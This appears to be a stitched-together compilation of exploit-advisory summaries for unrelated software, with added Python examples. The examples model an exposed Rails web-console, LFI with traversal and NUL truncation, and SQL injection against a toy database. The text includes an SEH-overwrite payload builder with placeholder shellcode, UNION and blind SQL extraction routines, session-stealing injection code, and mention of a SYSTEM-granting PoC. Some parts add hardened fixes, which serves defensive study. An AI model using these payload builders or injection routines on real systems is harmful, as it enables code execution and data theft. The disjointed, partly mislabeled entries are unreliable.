A buffer overflow vulnerability exists in Windows Media Player MediaInfo v0.7.61 when a specially crafted MP3 file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
This module exploits a remote code execution feature of the Ruby on Rails framework: the web-console gem, which runs an interactive Ruby console inside the browser. The feature is exposed if the config.web_console.whitelisted_ips setting includes untrusted IP ranges and the web-console gem is enabled.
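To make the misconfiguration concrete, here is an added example (it is not web-console's own code) that models the whitelist decision: a request gets the console when its remote address falls inside one of the configured networks. The default, the weak and the hardened whitelists, the attacker address and the 256-host threshold are all assumptions for the illustration.

```python
"""Model of a web-console style IP whitelist (added example, not the gem's code).

Assumption: a request may open the console when its remote address lies inside
any whitelisted network, and the default admits loopback only.
"""
import ipaddress

# Assumed default: only loopback may open the console.
DEFAULT_WHITELIST = ["127.0.0.1", "::1"]
# Constructed misconfiguration: "everyone" added to make the console reachable for a team.
WEAK_WHITELIST = ["127.0.0.1", "::1", "0.0.0.0/0"]
# Constructed hardened value: loopback plus one small developer VPN range.
HARDENED_WHITELIST = ["127.0.0.1", "::1", "10.20.0.0/24"]


def parse_whitelist(entries):
    """Turn config strings ('127.0.0.1', '10.0.0.0/8') into network objects."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def console_allowed(remote_ip, entries):
    """True if the requester's address lies inside any whitelisted network.
    ipaddress answers False for a version mismatch (e.g. an IPv4 address in ::1/128)."""
    ip = ipaddress.ip_address(remote_ip)
    return any(ip in net for net in parse_whitelist(entries))


def untrusted_ranges(entries, max_hosts=256):
    """Audit helper: list non-loopback entries that admit more than max_hosts addresses."""
    return [str(net) for net in parse_whitelist(entries)
            if not net.is_loopback and net.num_addresses > max_hosts]


if __name__ == "__main__":
    attacker = "203.0.113.7"   # constructed Internet address
    for label, wl in [("default", DEFAULT_WHITELIST), ("weak", WEAK_WHITELIST),
                      ("hardened", HARDENED_WHITELIST)]:
        print(f"{label:9} console for {attacker}: {console_allowed(attacker, wl)!s:5} "
              f"broad entries: {untrusted_ranges(wl)}")
```

Running it shows that 0.0.0.0/0 hands the console, and with it code execution as the Rails process, to any address that can reach the application, while the hardened list admits only loopback and the VPN range.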
RPCScan v2.03 is vulnerable to an SEH overwrite. By supplying a malicious payload in the Hostname/IP field, an attacker can overwrite the SEH frame and execute arbitrary code. The offset to the SEH frame is 536 bytes; the next-SEH pointer and the handler address that follow it are each 4 bytes long.
Credits go to koczkatama for coding a PoC. Note that if you run this exploit over a shell connection rather than a remote desktop session, the privileged shell is spawned in a new GUI window on the target's desktop, so it will not appear in your shell. PoC: download the source code (C#); a compiled version is also provided. Copy the DLL and the executable to the target machine and run the executable to get SYSTEM.
The ASUS "Generic Function Service" includes a pair of drivers, ASMMAP.sys / ASMMAP64.sys, whose version resources describe them as "Memory mapping Driver". The description is accurate: the driver exposes two IOCTLs, 0x9C402580 and 0x9C402584, that map or unmap any part of physical memory into the calling process' address space with read/write permissions. Any local process that can open the device therefore gets arbitrary physical memory read and write, which is equivalent to running code in the kernel. This PoC can dump a block of physical memory to disk and write a block of physical memory from a file.
ZeewaysCMS suffers from a local file inclusion (LFI) vulnerability: URL-encoded input passed through the 'targeturl' GET parameter is not properly verified before being used to include files. This can be exploited to include local files by combining directory traversal with a URL-encoded NULL byte (%00), which truncates any suffix the application appends to the path. Multiple cross-site scripting vulnerabilities were also discovered: input passed via multiple parameters is not properly sanitized before being returned to the user, which can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
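The following is an added example, not ZeewaysCMS code: a model of the 'targeturl' include that shows why traversal plus %00 reaches /etc/passwd, and a containment check that stops it. The template directory, the '.php' suffix the application appends and the payloads are constructed; the NUL truncation reproduces how NUL-terminated file APIs (and older PHP versions) read the path.

```python
"""Model of an LFI through a URL-encoded parameter (added example, not the CMS's code)."""
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/app/templates"   # constructed
SUFFIX = ".php"                        # constructed: suffix the application appends

# Constructed attacker inputs as they would appear in the query string.
PAYLOADS = [
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
    "%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00",
    "header",                          # a legitimate template name
]


def vulnerable_include_path(raw_param, base_dir=BASE_DIR):
    """What the CMS does: decode once, glue onto the base directory, append the suffix."""
    return os.path.join(base_dir, unquote(raw_param) + SUFFIX)


def as_c_string(path):
    """A NUL-terminated file API stops reading at the first NUL, dropping the suffix."""
    return path.split("\x00", 1)[0]


def effective_target(raw_param, base_dir=BASE_DIR):
    """The file actually opened by the vulnerable code path, after traversal is resolved."""
    return os.path.normpath(as_c_string(vulnerable_include_path(raw_param, base_dir)))


def safe_include_path(raw_param, base_dir=BASE_DIR):
    """Hardened version: reject NUL bytes, resolve the path, require it to stay under base_dir.
    Returns the resolved path, or None when the request is rejected."""
    name = unquote(raw_param)
    if "\x00" in name:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base for an absolute name; the containment check catches that too.
    target = os.path.realpath(os.path.join(base, name + SUFFIX))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for raw in PAYLOADS:
        print(f"{raw!r:45} vulnerable -> {effective_target(raw)}")
        print(f"{'':45} hardened   -> {safe_include_path(raw)}")
```

An allow-list of template names is stronger still; the realpath containment check is the minimum that defeats both the traversal and the NUL truncation.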
This module exploits a pre-auth SQL injection in the login.php script, inside an UPDATE statement, to steal session data. It then exploits a second, post-auth SQL injection that writes a shell to the target using a relative path and gets SYSTEM.
i.FTP 2.21 is vulnerable to an SEH overwrite. An attacker with access to the application can paste malicious content into the Host Address / URL field. This overflows a buffer and allows the attacker to execute arbitrary code.
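Both the RPCScan and the i.FTP entries are classic SEH overwrites through a text field. The block below is an added example, not either published exploit: it lays out the payload for a 32-bit target and checks it before it is pasted into the field. The 536-byte offset and the 4-byte nSEH and handler fields come from the RPCScan advisory; the POP POP RET address, the shellcode bytes and the bad-character set are placeholders for the illustration (i.FTP's offset is not given on this page).

```python
"""SEH-overwrite payload layout and pre-flight checks (added example, not the original exploits)."""
import struct

OFFSET_TO_SEH = 536                  # RPCScan 2.03 (advisory); adjust per target
BAD_CHARS = b"\x00\x0a\x0d"          # assumed: bytes a text field would truncate or strip
# jmp short +6: the jump is 2 bytes, so it lands at offset+8, right past the 4-byte handler
# slot and on the NOP sled; two NOPs fill the rest of the nSEH field.
NSEH_JMP = b"\xeb\x06\x90\x90"
# Placeholder: address of a POP POP RET sequence in a module built without SafeSEH.
POP_POP_RET = 0x10101010
# Placeholder shellcode: INT3 breakpoints (replace with real shellcode).
SHELLCODE = b"\xcc" * 8


def build_seh_payload(offset=OFFSET_TO_SEH, handler=POP_POP_RET, shellcode=SHELLCODE, sled=16):
    """junk | nSEH (short jmp) | SEH handler (pop pop ret) | NOP sled | shellcode"""
    return (b"A" * offset
            + NSEH_JMP
            + struct.pack("<I", handler)
            + b"\x90" * sled
            + shellcode)


def seh_frame(payload, offset=OFFSET_TO_SEH):
    """Read back the two overwritten fields the exception dispatcher will consume."""
    nseh = payload[offset:offset + 4]
    handler = struct.unpack("<I", payload[offset + 4:offset + 8])[0]
    return nseh, handler


def jmp_target(payload, offset=OFFSET_TO_SEH):
    """Where the nSEH short jump lands: end of the 2-byte instruction plus its rel8 operand."""
    rel = struct.unpack("<b", payload[offset + 1:offset + 2])[0]
    return offset + 2 + rel


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return (index, byte) for every forbidden byte so it can be fixed before sending."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    p = build_seh_payload()
    print("nSEH, handler:", seh_frame(p))
    print("jump lands at:", jmp_target(p), "== offset+8:", jmp_target(p) == OFFSET_TO_SEH + 8)
    print("bad chars:", find_bad_chars(p))
```

Flow on the crash: the overwritten handler (POP POP RET) returns into the exception registration record, whose first field is the nSEH bytes; the short jump there skips the handler address and lands on the sled. A handler address containing a NUL byte, such as 0x00401000, is caught by find_bad_chars before the payload is sent.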
Ajaxel CMS version 8.0 and below suffers from multiple vulnerabilities including LFI, XSS, SQL injection and remote code execution via CSRF. The reflected XSS, SQL injection and local file disclosure issues can each be exploited by sending a maliciously crafted HTTP request to the vulnerable server. The CSRF-to-RCE PoC uses a maliciously crafted HTML form which, when submitted by a logged-in user's browser, sends the request to the vulnerable server.
Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and monitored-server details (name, IP and maintenance schedule). The downTimeScheduler.do script is vulnerable to boolean-based blind and UNION-based SQL injection, which allows complete unauthorized access to the back-end database, limited only by the privileges of the application's database user.
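The SQL injection entries above (the pre-auth injection inside an UPDATE statement that steals session data, and the boolean-based blind and UNION-based injection in downTimeScheduler.do) share one root cause. The block below is an added example, not the vendors' code or the original exploits: a miniature of each technique against an in-memory SQLite database, followed by the parameterised query that closes the id-based case. Table names, columns, rows and session tokens are all constructed.

```python
"""UNION-based, boolean-blind and UPDATE-statement SQL injection on a toy schema
(added example; nothing here is the affected products' code)."""
import sqlite3


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE schedules(id INTEGER PRIMARY KEY, server TEXT, maint TEXT);
        INSERT INTO schedules(server, maint) VALUES ('db01', 'Sun 02:00'), ('web01', 'Sat 23:00');
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT,
                           session TEXT, last_seen TEXT);
        INSERT INTO users(name, password, session, last_seen) VALUES
            ('admin', 's3cr3t', 'SESS-ADMIN-1', ''),
            ('guest', 'guest',  'SESS-GUEST-9', '');
    """)
    return con


def vulnerable_lookup(con, schedule_id):
    """downTimeScheduler.do style: the id parameter is concatenated into the query."""
    return con.execute("SELECT server, maint FROM schedules WHERE id = " + schedule_id).fetchall()


def safe_lookup(con, schedule_id):
    """Fix: bind the value; a non-numeric id raises ValueError before any SQL runs."""
    return con.execute("SELECT server, maint FROM schedules WHERE id = ?",
                       (int(schedule_id),)).fetchall()


def union_dump(con):
    """UNION-based: match the two output columns and read another table directly."""
    return vulnerable_lookup(con, "0 UNION SELECT name, password FROM users")


def oracle(con, condition):
    """Boolean-based blind: does the page still render row 1 with the condition attached?"""
    return len(vulnerable_lookup(con, f"1 AND ({condition})")) > 0


def blind_extract(con, subquery, max_len=64):
    """Recover a string one character at a time, binary-searching each code point."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:            # substr past the end yields NULL: every probe is false
            break
        out += chr(lo)
    return out


def vulnerable_touch_login(con, name, stamp):
    """login.php style: the UPDATE that records a login is built by concatenation."""
    con.execute(f"UPDATE users SET last_seen = '{stamp}' WHERE name = '{name}'")
    con.commit()


def steal_session(con, attacker="guest", victim="admin"):
    """Inject into the SET list so the victim's session is copied into the attacker's row."""
    stamp = (f"x', session = (SELECT session FROM users WHERE name = '{victim}') "
             f"WHERE name = '{attacker}' -- ")
    vulnerable_touch_login(con, attacker, stamp)
    return con.execute("SELECT session FROM users WHERE name = ?", (attacker,)).fetchone()[0]


if __name__ == "__main__":
    con = build_db()
    print("union   :", union_dump(con))
    print("blind   :", blind_extract(con, "SELECT password FROM users WHERE name = 'admin'"))
    print("session :", steal_session(con))
```

The blind path needs about seven requests per character (a binary search over 0..127), which is why sqlmap-style tooling is the practical route once the boolean oracle is confirmed. What the attacker can reach through either path is bounded by the application's database account, which is why that account should own only the tables the application needs.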